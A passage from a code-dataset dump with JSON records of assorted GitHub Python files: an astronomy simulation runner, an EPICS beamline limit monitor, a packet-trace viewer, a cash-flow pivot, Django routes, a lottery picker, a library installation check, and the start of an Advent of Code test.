galaxies\n for i in xrange(params['ngals']):\n # generate galaxy, image and k-image\n gal = galaxy.sample()\n\n im = bfd.return_array(gal,\n noise_var = noise_var,\n use_gaussian_noise = True,\n convolve_with_psf = True,\n psf=psf,\n **params)\n\n kdata = bfd.simpleImage(im,cent,psfarr,\n pixel_scale=params['pixel_scale'],\n pixel_noise=np.sqrt(noise_var),\n pad_factor=params['pad_factor'])\n\n # start moment calculator\n m = bfd.MomentCalculator(kdata,wt,id=i,nda=1./params['ngals'])\n\n\n # if template, save even & odd moments and derivs from iterating around\n if template:\n # run procedure to obtain templates at different coords near galaxy center\n t = m.make_templates(**params['TEMPLATE'])\n if t[0] is None:\n logging.warning(t[1] + \" for %sth galaxy\" %(i))\n else:\n for tmpl in t:\n tab.add(tmpl)\n else:\n # if target get moments at MX=MY=0 (only care about even moments)\n xyshift, error, msg = m.recenter()\n if error:\n logging.warning(\"recentering did not work for %sth galaxy: %s\" %(i,msg))\n tab.addLost()\n else:\n tab.add(m.get_moment(0,0), xy=xyshift, id=i)\n # save out binary fits files\n tab.save(os.path.join(params['dir'],params['outfile']))\n\n\nif __name__ == '__main__':\n params = parse_input()\n\n aa=time.clock()\n aaa=time.time()\n\n # run program to produced target/template galaxies and save their moments in a fits file\n main(params)\n\n bb=time.clock()\n bbb=time.time()\n logging.info(\"run time %s\" %(bb-aa))\n logging.info(\"clock time %s\" %(bbb-aaa))\n\n sys.exit(0)\n","repo_name":"mgatti29/bfd_desy6kp","sub_path":"src/runsim.py","file_name":"runsim.py","file_ext":"py","file_size_in_byte":14523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20287595114","text":"import numpy as np\nimport epics\nfrom bsread import source\n\n# BAM Channels data taken from bs\n#BAM1 = 'S10BC01-DBAM070:EOM1_T1'\nBAM1 = 'SARES11-LSCP10-FNS:CH1:VAL_GET' ###############\n\n# PACM PVs\nLAS_XRAY_ERR = 'SLAAR11-GEN:LAS-XRAY-ERR'\nLAS_XRAY_MSG = 'SLAAR11-GEN:LAS-XRAY-MSGD'\nLAS_XRAY_REF = 'SLAAR11-GEN:LAS-XRAY-REF'\nLAS_XRAY_BAD = 'SLAAR11-GEN:LAS-XRAY-BAD'\nLAS_XRAY = 'SLAAR11-GEN:LAS-XRAY'\n\nLAS_EVR_ERR = 'SLAAR11-GEN:LAS-EVR-ERR'\nLAS_EVR_MSG = 'SLAAR11-GEN:LAS-EVR-MSGD'\nLAS_EVR_REF = 'SLAAR11-GEN:LAS-EVR-REF'\nLAS_EVR_BAD = 'SLAAR11-GEN:LAS-EVR-BAD'\nLAS_EVR = 'SLAAR11-GEN:LAS-EVR'\n\nXRAY_EVR_ERR = 'SLAAR11-GEN:XRAY-EVR-ERR'\nXRAY_EVR_MSG = 'SLAAR11-GEN:XRAY-EVR-MSGD'\nXRAY_EVR_REF = 'SLAAR11-GEN:XRAY-EVR-REF'\nXRAY_EVR_BAD = 'SLAAR11-GEN:XRAY-EVR-BAD'\nXRAY_EVR = 'SLAAR11-GEN:XRAY-EVR'\n\n# Setup of PACM PVs\nLAS_XRAY_ERR_pv = epics.PV(LAS_XRAY_ERR)\nLAS_XRAY_MSG_pv = epics.PV(LAS_XRAY_MSG)\nLAS_XRAY_REF_pv = epics.PV(LAS_XRAY_REF)\nLAS_XRAY_BAD_pv = epics.PV(LAS_XRAY_BAD)\nLAS_XRAY_pv = epics.PV(LAS_XRAY)\n\nLAS_EVR_ERR_pv = epics.PV(LAS_EVR_ERR)\nLAS_EVR_MSG_pv = epics.PV(LAS_EVR_MSG)\nLAS_EVR_REF_pv = epics.PV(LAS_EVR_REF)\nLAS_EVR_BAD_pv = epics.PV(LAS_EVR_BAD)\nLAS_EVR_pv = epics.PV(LAS_EVR)\n\nXRAY_EVR_ERR_pv = epics.PV(XRAY_EVR_ERR)\nXRAY_EVR_MSG_pv = epics.PV(XRAY_EVR_MSG)\nXRAY_EVR_REF_pv = epics.PV(XRAY_EVR_REF)\nXRAY_EVR_BAD_pv = epics.PV(XRAY_EVR_BAD)\nXRAY_EVR_pv = epics.PV(XRAY_EVR)\n\n# PALM PVs\nPALM_LIVE_ERR = 'SLAAR11-GEN:PALM-LIVE-ERR'\nPALM_LIVE_MSG = 'SLAAR11-GEN:PALM-LIVE-MSGD'\nPALM_LIVE_REF = 'SLAAR11-GEN:PALM-LIVE-REF'\nPALM_LIVE_BAD = 'SLAAR11-GEN:PALM-LIVE-BAD'\nPALM_LIVE = 'SAROP11-PALMK118:LIVE'\n\nPALM_RAVE_ERR = 'SLAAR11-GEN:PALM-RAVE-ERR'\nPALM_RAVE_MSG = 'SLAAR11-GEN:PALM-RAVE-MSGD'\nPALM_RAVE_REF = 'SLAAR11-GEN:PALM-RAVE-REF'\nPALM_RAVE_BAD = 'SLAAR11-GEN:PALM-RAVE-BAD'\nPALM_RAVE = 'SAROP11-PALMK118:RAVE'\n\n# Setup of PALM PVs\nPALM_LIVE_ERR_pv = epics.PV(PALM_LIVE_ERR)\nPALM_LIVE_MSG_pv = epics.PV(PALM_LIVE_MSG)\nPALM_LIVE_REF_pv = epics.PV(PALM_LIVE_REF)\nPALM_LIVE_BAD_pv = epics.PV(PALM_LIVE_BAD)\nPALM_LIVE_pv = epics.PV(PALM_LIVE)\n\nPALM_RAVE_ERR_pv = epics.PV(PALM_RAVE_ERR)\nPALM_RAVE_MSG_pv = epics.PV(PALM_RAVE_MSG)\nPALM_RAVE_REF_pv = epics.PV(PALM_RAVE_REF)\nPALM_RAVE_BAD_pv = epics.PV(PALM_RAVE_BAD)\nPALM_RAVE_pv = epics.PV(PALM_RAVE)\n\n# PPROBE PVs\nPPROBE_LIVE_ERR = 'SLAAR11-GEN:PPROBE-ERR'\nPPROBE_LIVE_MSG = 'SLAAR11-GEN:PPROBE-MSGD'\nPPROBE_LIVE_REF = 'SLAAR11-GEN:PPROBE-REF'\nPPROBE_LIVE_BAD = 'SLAAR11-GEN:PPROBE-BAD'\nPPROBE_LIVE = 'SLAAR11-PPROBE:LIVE'\n\nPPROBE_RAVE_ERR = 'SLAAR11-GEN:PP-RAVE-ERR'\nPPROBE_RAVE_MSG = 'SLAAR11-GEN:PP-RAVE-MSGD'\nPPROBE_RAVE_REF = 'SLAAR11-GEN:PP-RAVE-REF'\nPPROBE_RAVE_BAD = 'SLAAR11-GEN:PP-RAVE-BAD'\nPPROBE_RAVE = 'SLAAR11-PPROBE:RAVE'\n\n# Setup of PPROBE PVs\nPPROBE_LIVE_ERR_pv = epics.PV(PPROBE_LIVE_ERR)\nPPROBE_LIVE_MSG_pv = epics.PV(PPROBE_LIVE_MSG)\nPPROBE_LIVE_REF_pv = epics.PV(PPROBE_LIVE_REF)\nPPROBE_LIVE_BAD_pv = epics.PV(PPROBE_LIVE_BAD)\nPPROBE_LIVE_pv = epics.PV(PPROBE_LIVE)\n\nPPROBE_RAVE_ERR_pv = epics.PV(PPROBE_RAVE_ERR)\nPPROBE_RAVE_MSG_pv = epics.PV(PPROBE_RAVE_MSG)\nPPROBE_RAVE_REF_pv = epics.PV(PPROBE_RAVE_REF)\nPPROBE_RAVE_BAD_pv = epics.PV(PPROBE_RAVE_BAD)\nPPROBE_RAVE_pv = epics.PV(PPROBE_RAVE)\n\n# BAM PVs\nBAM1_ERR = 'SLAAR11-GEN:BAM070-ERR'\nBAM1_MSG = 'SLAAR11-GEN:BAM070-MSGD'\nBAM1_REF = 'SLAAR11-GEN:BAM070-REF'\nBAM1_BAD = 'SLAAR11-GEN:BAM070-BAD'\n\n# Setup of BAM PVs\nBAM1_ERR_pv = epics.PV(BAM1_ERR)\nBAM1_MSG_pv = epics.PV(BAM1_MSG)\nBAM1_REF_pv = epics.PV(BAM1_REF)\nBAM1_BAD_pv = epics.PV(BAM1_BAD)\n\n# LAM PVs\nLAM252_ERR = 'SLAAR11-GEN:LAM252-ERR'\nLAM252_MSG = 'SLAAR11-GEN:LAM252-MSGD'\nLAM252_REF = 'SLAAR11-GEN:LAM252-REF'\nLAM252_BAD = 'SLAAR11-GEN:LAM252-BAD'\nLAM252 = 'SLAAR01-LMOT-M252:MOT.RBV'\n\nLAM11_ERR = 'SLAAR11-GEN:LAM11-ERR'\nLAM11_MSG = 'SLAAR11-GEN:LAM11-MSGD'\nLAM11_REF = 'SLAAR11-GEN:LAM11-REF'\nLAM11_BAD = 'SLAAR11-GEN:LAM11-BAD'\nLAM11= 'SLAAR11-GEN:LAM11'\n\n# Setup of LAM PVs\nLAM252_ERR_pv = epics.PV(LAM252_ERR)\nLAM252_MSG_pv = epics.PV(LAM252_MSG)\nLAM252_REF_pv = epics.PV(LAM252_REF)\nLAM252_BAD_pv = epics.PV(LAM252_BAD)\nLAM252_pv = epics.PV(LAM252)\n\nLAM11_ERR_pv = epics.PV(LAM11_ERR)\nLAM11_MSG_pv = epics.PV(LAM11_MSG)\nLAM11_REF_pv = epics.PV(LAM11_REF)\nLAM11_BAD_pv = epics.PV(LAM11_BAD)\nLAM11_pv = epics.PV(LAM11)\n# Limit calcs\nwith source(channels=[BAM1]) as stream:\n while True:\n message = stream.receive()\n PulseID = message.data.pulse_id\n \n # PACM \n if PulseID%4 == 0:\n if np.logical_and(LAS_XRAY_pv.get() > LAS_XRAY_REF_pv.get()-LAS_XRAY_ERR_pv.get(),LAS_XRAY_pv.get() < LAS_XRAY_REF_pv.get()+LAS_XRAY_ERR_pv.get()):\n LAS_XRAY_MSG_pv.put(PulseID)\n if np.logical_and(LAS_EVR_pv.get() > LAS_EVR_REF_pv.get()-LAS_EVR_ERR_pv.get(),LAS_EVR_pv.get() < LAS_EVR_REF_pv.get()+LAS_EVR_ERR_pv.get()):\n LAS_EVR_MSG_pv.put(PulseID)\n if np.logical_and(XRAY_EVR_pv.get() > XRAY_EVR_REF_pv.get()-XRAY_EVR_ERR_pv.get(),XRAY_EVR_pv.get() < XRAY_EVR_REF_pv.get()+XRAY_EVR_ERR_pv.get()):\n XRAY_EVR_MSG_pv.put(PulseID)\n # PALM \n if PulseID%4 == 0:\n if np.logical_and(PALM_LIVE_pv.get() > PALM_LIVE_REF_pv.get()-PALM_LIVE_ERR_pv.get(),PALM_LIVE_pv.get() < PALM_LIVE_REF_pv.get()+PALM_LIVE_ERR_pv.get()):\n PALM_LIVE_MSG_pv.put(PulseID)\n if np.logical_and(PALM_RAVE_pv.get() > PALM_RAVE_REF_pv.get()-PALM_RAVE_ERR_pv.get(),PALM_RAVE_pv.get() < PALM_RAVE_REF_pv.get()+PALM_RAVE_ERR_pv.get()):\n PALM_RAVE_MSG_pv.put(PulseID)\n\n # BAM \n if PulseID%4 == 0:\n BAM1Val = message.data.data[BAM1].value\n BAM1Val = BAM1Val*1000\n if np.logical_and(BAM1Val > BAM1_REF_pv.get()-BAM1_ERR_pv.get(),BAM1Val < BAM1_REF_pv.get()+BAM1_ERR_pv.get()):\n BAM1_MSG_pv.put(PulseID)\n # LAM\n LAMFAC = 6666.6 \n if PulseID%4 == 0:\n if np.logical_and(LAM252_pv.get()*LAMFAC > LAM252_REF_pv.get()-LAM252_ERR_pv.get(),LAM252_pv.get()*LAMFAC < LAM252_REF_pv.get()+LAM252_ERR_pv.get()):\n LAM252_MSG_pv.put(PulseID)\n if PulseID%4 == 0:\n if np.logical_and(LAM11_pv.get()*LAMFAC > LAM11_REF_pv.get()-LAM11_ERR_pv.get(),LAM11_pv.get()*LAMFAC < LAM11_REF_pv.get()+LAM11_ERR_pv.get()):\n LAM11_MSG_pv.put(PulseID)\n # PPROBE \n if PulseID%4 == 0:\n if np.logical_and(PPROBE_LIVE_pv.get() > PPROBE_LIVE_REF_pv.get()-PPROBE_LIVE_ERR_pv.get(),PPROBE_LIVE_pv.get() < PPROBE_LIVE_REF_pv.get()+PPROBE_LIVE_ERR_pv.get()):\n PPROBE_LIVE_MSG_pv.put(PulseID)\n if np.logical_and(PPROBE_RAVE_pv.get() > PPROBE_RAVE_REF_pv.get()-PPROBE_RAVE_ERR_pv.get(),PPROBE_RAVE_pv.get() < PPROBE_RAVE_REF_pv.get()+PPROBE_RAVE_ERR_pv.get()):\n PPROBE_RAVE_MSG_pv.put(PulseID)\n\n","repo_name":"arrellc/PhotonDiagOnline","sub_path":"PALM/AlvraLimits.py","file_name":"AlvraLimits.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16254486186","text":"import sys\nfrom function import *\nfrom gui import *\n\ndef openFile():\n fp = \"\"\n while True:\n try:\n fp = open(openPath(), 'r')\n break\n except OSError:\n if fp == \"\": exit()\n continue\n return fp\n\n#verifier filepath\nif(len(sys.argv)==1):\n fp = openFile()\nelif(len(sys.argv)>2):\n notify(\"Error\",\"Too many arguements, please select a file instead\")\n fp = openFile()\nelse:\n try:\n fp = open(sys.argv[1], 'r')\n except FileNotFoundError:\n notify(\"Error\",\"File not found, please select another file\")\n fp = openFile()\n\nwhile True:\n numTrame = 0\n tab = [[]]\n brut = [\"\"]\n ifBreak = True\n for line in fp.read().lower().splitlines():\n tmp = line.split(' ')\n\n #verifier offset\n offset = tmp.pop(0)\n try:\n if(int(offset,16) == 0 and len(tab[numTrame])>0): \n numTrame += 1\n tab.append([])\n brut.append(\"\")\n if(int(offset,16) > len(tab[numTrame])): \n notify(\"Error\",\"Offset error, please select another file\")\n fp.close()\n fp = openFile()\n ifBreak = False\n break\n brut[numTrame] = brut[numTrame][0:len(brut[numTrame])-3*(len(tab[numTrame])-int(offset,16))]\n brut[numTrame] += \"\\n\"\n tab[numTrame] = tab[numTrame][0:int(offset,16)]\n except ValueError:\n continue\n\n #verifier format / eliminer mots invalides\n brut[numTrame] += offset + \" \"\n for oct in tmp:\n try:\n if(len(oct)==2 and int(oct,16)<=255):\n brut[numTrame] += \" \" + oct\n tab[numTrame].append(oct)\n except ValueError:\n continue\n\n if ifBreak: fp.close()\n\n tramelist = []\n titlelist = []\n output = open(\"output.txt\",\"w\")\n\n #analyse & write\n if ifBreak: \n for trame in tab:\n try:\n out,title = Ethernet(trame.copy())\n except IndexError:\n notify(\"Error\",\"Erreur trame non complete à la ligne \"+str(len(trame)//16+1)+\" octet n° \"+str(len(trame)%16+1))\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n except Exception as text:\n notify(\"Error\",repr(text))\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n \n\n tramelist.append(out)\n titlelist.append(title)\n output.write(\"##########\\n\"+str(titlelist.index(title)+1)+\" - \"+title+\"\\n##########\\n\")\n output.write(out+\"\\n\\n\")\n\n #affichage\n if ifBreak:\n try:\n show(tramelist,titlelist,brut)\n except Exception:\n notify(\"Error\",\"Error while showing, please select another file\")\n output.close()\n open(\"output.txt\", 'w').close()\n fp = openFile()\n ifBreak = False\n break\n output.close()\n \n if ifBreak: break\n\nnotify(\"Success\",\"Info saved to output.txt\")","repo_name":"MRVNY/Offline","sub_path":"offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21509654122","text":"import pandas as pd\nimport datetime\n\n#cf = pd.read_csv('PF_Pivot1.csv', delimiter=';')\n#Questa forma permette di trasformare le colonne numeriche in int con punto per decimale e senza punti per migliaia\ncf = pd.read_csv(\"PF_Pivot1.csv\", sep=';', header=0, skip_blank_lines=True, decimal=',',thousands='.')\n\nprint(cf.head(10))\n\ndef blank_cell(cf):\n '''Funzione completa per la sostituzione dei nomi nella\n colonna Fornitore dove le celle sono vuote la funzione\n riporta il nome della prima cella in alto non vuota fino a che\n trova una cella vuota '''\nfor i in range(len(cf)):\n if not pd.isna(cf.loc[i, 'Fornitore']):\n cp=cf.loc[i, 'Fornitore']\n print(cf.loc[i, 'Fornitore'])\n else:\n cf.loc[i, 'Fornitore']=cp\n #print('vuota')\n\n'''Creazione della lista di tipi di pagamento unici \nattraverso l'uso di se()\nla variabole pag contiene l'elenco unico dei tipi di pagamento'''\n\npag = set(cf.loc[0:,'Pagamento Documento'])\n\n#DOTO List\n'''\n- creazione della colonna mese di pagamento in cui si indica il mese di pagamento. \nLa colonna è popolata con una funzione che usa i valori nella colonna OrAcq - Data Effettiva Evasione e\nse guesta è vuota dalla colonna OrAcq - Data Prevista Evasione e estrare il mese usando il modulo datetime\n- una volta creata la tabella si possono creare delle funzioni di aggregazione legate al\n nome del fornitore,data pagamento e tipo di pagamento suddiviso per i mesi dell'anno e il totale\n- nelle righe i nomi dei fornitori con gli importi aggregati e sommati per mese e tipo di pagamento\n'''\n\n'''La formula per raggruppare per colonne e fare la somma dei valori: \nquesta stringa ci serve per raggruppare i fornitori per data e fare la somma dei valori indicati in sum'''\n\ncf.groupby(['Fornitore','OrAcq - Data Prevista Evasione']).sum()\n\n'''questo è il modo per scegliere la colonna da sommare, as_index=False server per riportare il nome del fornitore su tutte\nle righe'''\n\ncf.groupby(['Fornitore','OrAcq - Data Prevista Evasione'], as_index=False)['OrAcq - Importo Generale Evaso 1'].sum()\n\n'''dopo questo è possibile usare le funzione groupby per sommare gli importi '''\n\n'''le colonen da dropapre perché non mi servono\n- Articolo, OrAcq - Numero Documento, Causale Documento, \n\nil comando prr dropapre in maniera permanente in pandas è:\ndf.drop('Articolo', inplace=True, axis=1)\n\n'''\n\n#Estrazione mesi da date\ndate_effettive = cf['OrAcq - Data Effettiva Evasione'].values\ndate_previste = cf['OrAcq - Data Prevista Evasione'].values\ndef getMesiAnniFromDate(date_effettive, date_previste):\n mesi = []\n anni = []\n for i, de in enumerate(date_effettive):\n if str(de) != 'nan' and str(de) != 'Non definito':\n spl = de.split()\n mesi.append(spl[1])\n anni.append(int(spl[2]))\n else:\n dp = date_previste[i]\n if str(dp) != 'nan':\n spl = dp.split()\n mesi.append(spl[1])\n anni.append(int(spl[2]))\n else:\n mesi.append('nan')\n anni.append(-1)\n\n return mesi, anni\n \nmesi, anni = getMesiAnniFromDate(date_effettive, date_previste)\ncf['Anno'] = anni\n\n\npiv = cf.pivot_table(values='OrAcq - Importo Generale Evaso 1', index=['Fornitore','Pagamento Documento'], columns=['Mese','Anno'], aggfunc='first', fill_value=0, sort=True)\n\n#per ordinare le colonne in modo corretto\npiv = piv.reindex(columns=['gen','feb','mar','apr','mag','giu','lug','ago','set','ott','nov','dic','nan'])\n","repo_name":"exploevo/CashFlow","sub_path":"CashFlow.py","file_name":"CashFlow.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71992722221","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^$', 'django.views.generic.simple.redirect_to', {'url': 'cabinet/'}),\n (r'^admin/', include(admin.site.urls)),\n (r'^cabinet/', include('acm.cabinet.urls')),\n (r'^membership/', include('acm.membership.urls')),\n)\n\n\n","repo_name":"emef/ACM","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22357692596","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\ndf = pd.read_csv('dlt.csv')\n\n\n# ![](http://img4.cache.netease.com/sports/2014/5/5/20140505211309dffc6.png)\n\n\nbonus = {\n (0, 2): 5,\n (2, 1): 5,\n (1, 2): 5,\n (3, 0): 5,\n (2, 2): 10,\n (3, 1): 10,\n (4, 0): 10,\n (3, 2): 200,\n (4, 1): 200,\n (4, 2): 10,\n (5, 0): 10,\n (5, 1): 5000000,\n (5, 2): 10000000,\n}\n\n\n# 检查列表\n\ntopic, n = 'dlt', 5\nhot_water = sorted(glob(f'gamble/{topic}/*-{topic}.csv'))[-1]\ndate = hot_water[-18:-8]\ndf_dream = pd.read_csv(hot_water)\n\nlast_shit = df.loc[df.date <= date, 'date'].max()\ndf_last = df.loc[df.date == last_shit, df_dream.columns]\nlist_last = df_last.values[0].tolist()\nprint(last_shit, list_last)\n\n\ndef getd(v):\n return len(set(v[:n]) & set(list_last[:n])), len(set(v[n:]) & set(list_last[n:]))\n\n\ndf_dream['check'] = df_dream.apply(getd, axis=1)\ndf_dream['bonus'] = df_dream.check.apply(lambda _: bonus.get(_, 0))\nprint(df_dream)\nprint('bonus', df_dream['bonus'].sum())\n\n# 抽取新索引\ntd = str(pd.datetime.today().date())\nnp.random.seed()\nbset = df.loc[:, 'fore1':'back2'].apply(set, axis=1)\n\nia = np.random.choice(df.index)\nidx = [ia]\nobj = bset[ia]\nfor i in range(4):\n ib = np.random.choice(bset.apply(\n lambda _: len(_ & obj)).nsmallest(10).index)\n idx.append(ib)\n obj |= bset[ib]\n\nds = df.loc[idx, ['fore1', 'fore2', 'fore3','fore4', 'fore5', 'back1', 'back2']]\nobj = set(np.reshape(ds.loc[:, 'fore1':'fore5'].values, (1, 25))[0])\nprint('red', len(obj), sorted(set(range(1, 36)) - obj))\nds.to_csv(f'gamble/dlt/{td}-dlt.csv', index=False)\nprint(ds)\n","repo_name":"muxuezi/lottery","sub_path":"dlt_dream.py","file_name":"dlt_dream.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"4681737659","text":"import subprocess\nimport re\nimport argparse\nfrom pathlib import Path\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Script to verify that installation of the project has no unexpected or \\\n missing files, and that all installed includes compile stand-alone')\n parser.add_argument('--src-dir', required=True, help='Ramses logic source dir')\n parser.add_argument('--install-dir', required=True, help='Directory where ramses logic was installed')\n parser.add_argument('--ignore', required=False, action='append', nargs='*', help='Ignore file patterns from the installation folder')\n parser.add_argument('--headless', required=False, action='store_true', help='Check for headless binaries (no ramses renderer)')\n args = parser.parse_args()\n\n # Expect exactly these files after installation (don't list header files here, they are cross-checked with source tree)\n expectNonheaderFiles = [\n # Ramses\n r\"^lib/libramses-shared-lib-[\\w-]+\\.so$\",\n r\"^lib/libramses-shared-lib-[\\w-]+\\.so\\.\\d+\\.\\d+$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/LICENSE\\.txt$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/CHANGELOG\\.txt$\",\n r\"^share/doc/ramses-sdk-\\d+\\.\\d+\\.\\d+/README\\.md$\",\n # Ramses Logic\n r\"^bin/ramses-logic-viewer-headless$\",\n r\"^lib/libramses-logic\\.so$\",\n r\"^lib/libramses-logic\\.so\\.\\d+$\",\n r\"^lib/cmake/ramses-logic-\\d+\\.\\d+/ramses-logicConfig\\.cmake$\",\n r\"^lib/cmake/ramses-logic-\\d+\\.\\d+/ramses-logicConfigVersion\\.cmake$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/CHANGELOG\\.md$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/README\\.md$\",\n r\"^share/doc/RamsesLogic-\\d+\\.\\d+\\.\\d+/LICENSE\\.txt$\",\n ]\n\n if args.headless:\n expectNonheaderFiles += [\n r\"^lib/cmake/ramses-shared-lib-client-only-\\d+\\.\\d+/ramses-shared-lib-client-onlyConfigVersion\\.cmake$\",\n r\"^lib/cmake/ramses-shared-lib-client-only-\\d+\\.\\d+/ramses-shared-lib-client-onlyConfig\\.cmake$\",\n ]\n else:\n expectNonheaderFiles += [\n r\"^bin/ramses-logic-viewer$\",\n r\"^bin/ramses-renderer-[\\w-]+$\",\n r\"^lib/cmake/ramses-shared-lib-\\d+\\.\\d+/ramses-shared-libConfigVersion\\.cmake$\",\n r\"^lib/cmake/ramses-shared-lib-\\d+\\.\\d+/ramses-shared-libConfig\\.cmake$\",\n ]\n\n installPath = Path(args.install_dir)\n includePath = installPath / \"include\"\n\n installedHeaders = []\n unexpectedFiles = []\n\n for path in installPath.rglob(\"*\"):\n if path.is_dir():\n continue\n\n relPathStr = str(path.relative_to(installPath))\n\n # Handle all cases, don't skip anything\n if re.match(r'^include/ramses-\\d+', relPathStr):\n # Ignore include file, it belongs to RAMSES and is checked by RAMSES already\n pass\n elif re.match(r'^include/ramses-logic/', relPathStr):\n # Ramses logic header file - add to special list to check compilation later\n installedHeaders.append(str(path.relative_to(includePath)))\n else:\n for f in expectNonheaderFiles:\n if re.match(f, relPathStr):\n expectNonheaderFiles.remove(f)\n break\n else:\n unexpectedFiles.append(relPathStr)\n\n print(\"Checking install non-header files\")\n\n if args.ignore:\n # This is required because we use the more compatible 'append' option of argparse in favor of 'extend'\n patterns = [i[0] for i in args.ignore]\n print(f\"Ignoring file patterns: {', '.join(patterns)}\")\n unexpectedFiles = [f for f in unexpectedFiles if not any([re.search(p, f) for p in patterns])]\n expectNonheaderFiles = [f for f in expectNonheaderFiles if not any([re.search(p, f) for p in patterns])]\n\n # If all \"expected\" files were found, the list should be empty now - if not, report error\n if expectNonheaderFiles:\n print(\"Couldn't find some files in the install folder:\\n \" + \"\\n \".join(expectNonheaderFiles))\n return 1\n # Found a file that's not expected in the list? Error!\n if unexpectedFiles:\n print(\"Found following unexpected files in the install folder:\\n \" + \"\\n \".join(unexpectedFiles))\n return 1\n\n # Extract header files from the source tree\n srcIncludeDir = Path(args.src_dir) / 'include'\n srcApiHeaders = [str(f.relative_to(srcIncludeDir)) for f in srcIncludeDir.rglob(\"*\") if f.suffix == '.h']\n\n # check which headers are unexpected and which are missing\n unexpectedHeaders = list(set(installedHeaders) - set(srcApiHeaders))\n missingHeaders = list(set(srcApiHeaders) - set(installedHeaders))\n\n if len(unexpectedHeaders) > 0:\n print('ERROR: Headers should not be installed\\n ' + '\\n '.join(unexpectedHeaders))\n return 1\n if len(missingHeaders) > 0:\n print('ERROR: Headers are missing from installation\\n ' + '\\n '.join(missingHeaders))\n return 1\n\n # check that installed headers compile standalone with \"-pedantic\"\n print(\"Checking strict header compilation\")\n numPedanticErrors = 0\n for h in installedHeaders:\n temp_file = \"/tmp/rlogic_pedantic_header.cpp\"\n with open(temp_file, \"w\") as file:\n file.writelines(f\"#include \\\"{h}\\\"\\n\\n\")\n file.writelines(\"int main() {return 0;}\")\n\n cmd = f'g++ -std=c++17 -Werror -pedantic -I\"{str(includePath)}\" \"{temp_file}\" -o /tmp/rlogic-pedantic-header.o'\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n if p.returncode != 0:\n print(f'Header check failed for: {h}')\n print(cmd)\n print(out[0])\n print(out[1])\n numPedanticErrors += 1\n\n if numPedanticErrors > 0:\n print(\"ERROR: found errors with strict compilation in installed headers\")\n return 1\n\n print(\"Done\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"bmwcarit/ramses-logic","sub_path":"ci/scripts/installation-check/check-installation.py","file_name":"check-installation.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"7586364686","text":"from abc import abstractmethod\nfrom typing import cast, Tuple\n\nfrom app.core.use_cases.base_use_case import BaseUseCase\nfrom app.features.club.domain.entities.club_entity import ClubEntity\nfrom app.features.club.domain.entities.club_query import ClubRead\nfrom app.features.club.domain.repositories.club_unit_of_work import ClubUnitOfWork\n\n\nclass DeleteClubUseCase(BaseUseCase):\n unit_of_work: ClubUnitOfWork\n\n @abstractmethod\n def __call__(self, args: Tuple[int]) -> ClubRead:\n raise NotImplementedError()\n\n\nclass DeleteClubUseCaseImpl(DeleteClubUseCase):\n\n def __init__(self, unit_of_work: ClubUnitOfWork):\n self.unit_of_work = unit_of_work\n\n def __call__(self, args: Tuple[int]) -> ClubRead:\n id_, = args\n\n existing_club = self.unit_of_work.repository.find_by_id(id_)\n\n if existing_club is None:\n raise\n\n marked_club = existing_club.mark_entity_as_deleted()\n\n try:\n deleted_club = self.unit_of_work.repository.update(marked_club)\n self.unit_of_work.commit()\n except Exception:\n self.unit_of_work.rollback()\n raise\n\n return ClubRead.from_entity(cast(ClubEntity, deleted_club))\n","repo_name":"angelwayar/boliche_bd","sub_path":"app/features/club/domain/use_cases/delete_club.py","file_name":"delete_club.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"26643040131","text":"import os\nimport pytest\nimport unittest\nday = __import__('day_' + __file__[-5:-3])\n\n\nclass TestDay(unittest.TestCase):\n def setUp(self):\n self.real_data = open(os.path.dirname(__file__) + \"/input.txt\").read()\n self.data = \"\"\"Blueprint 1: Each ore robot costs 4 ore. Each clay robot costs 2 ore. Each obsidian robot costs 3 ore and 14 clay. Each geode robot costs 2 ore and 7 obsidian.\nBlueprint 2: Each ore robot costs 2 ore. Each clay robot costs 3 ore. Each obsidian robot costs 3 ore and 8 clay. Each geode robot costs 3 ore and 12 obsidian.\n\"\"\"\n self.data_2 = \"\"\"Blueprint 17: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 2 ore and 7 clay. Each geode robot costs 3 ore and 8 obsidian.\nBlueprint 21: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 4 ore and 6 clay. Each geode robot costs 3 ore and 11 obsidian.\nBlueprint 27: Each ore robot costs 4 ore. Each clay robot costs 3 ore. Each obsidian robot costs 3 ore and 10 clay. Each geode robot costs 3 ore and 10 obsidian.\nBlueprint 30: Each ore robot costs 4 ore. Each clay robot costs 4 